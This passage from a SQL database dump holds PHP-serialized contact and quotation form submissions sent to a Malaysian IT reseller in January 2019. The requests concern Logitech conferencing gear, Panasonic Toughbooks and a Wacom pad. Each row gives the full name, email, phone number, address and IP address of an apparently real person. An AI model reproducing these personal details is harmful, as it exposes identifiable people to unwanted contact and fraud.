Connect\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"23\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-23 14:24:35','211.25.31.178','1'),(32,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:49:\"TENGKU MUHAMMAD IZZUL IKRAM BIN TENGKU ABDUL AZIZ\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"tengku_izzul@tmmsb.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0164461207\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"MASTURA IBRAHIM\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:42:\"LOT A-5, KAWASAN PERINDUSTRIAN CACAR, PAKA\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Logitech Group, Logitech Connect\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:53:\"To be used in meeting room. Budget as low as possible\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"23\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-24 16:00:58','175.145.84.120','1'),(33,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Jacaleen Lee\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"jacaleen@tem.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"017-5557468\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"T.E.M. Engineering Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:43:\"No 8 Jln TPP 6/7, Tmn Perindustrian Puchong\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Logitech MeetUp, Screen Share\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-25 09:19:49','219.92.37.17','1'),(34,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"syaiful hafiz\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"syaiful1104@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0124684887\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:7:\"private\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"dear bintara,\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-25 16:07:11','175.139.146.197','1'),(35,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Tun Dzulkarnain\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"dzul@sismaauto.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122147607\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Sisma Auto (KL) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:65:\"19, Jalan Perintis U1/52, Temasya Park, 40150 Shah Alam, Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 54\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"request quote for cf54 mk3\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-26 08:29:40','42.191.170.230','1'),(36,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"THUZAR MON\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"thuzarmon.alter@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0125069404\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"DIAMOND PALACE GROUP OF COMPANIES\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:42:\"I WANT TO BUY WACOM SIGNATURE PAD STU-300B\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"24\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-27 15:28:54','121.122.53.13','1'),(37,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"norqawi bin nordin\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"norqawi.nordin@kansaipaint.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0129910650\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"sime kansai paint sdn bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:107:\"Kawasan Perindustrian Bukit Raja, 41710, Solok Waja 2, Impian 2, 41050 Klang, Selangor Darul Ehsan Malaysia\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Logitech PTZ Pro 2\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:38:\"puchase for video conference purposes.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"91\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-28 09:36:05','203.176.149.253','1'),(38,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Lance\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"lance@magnumasia-ipo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60167602360\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Magnum\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:37:\"Logitech MeetUp, MeetUp Expansion Mic\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:155:\"Hi there, We would like to purchase 3 units of Logitech meet up cam, expansion mic and tv mount. Would you be able to quote? Thanks and best regards, Lance\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-28 15:24:31','175.136.217.179','1'),(39,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact 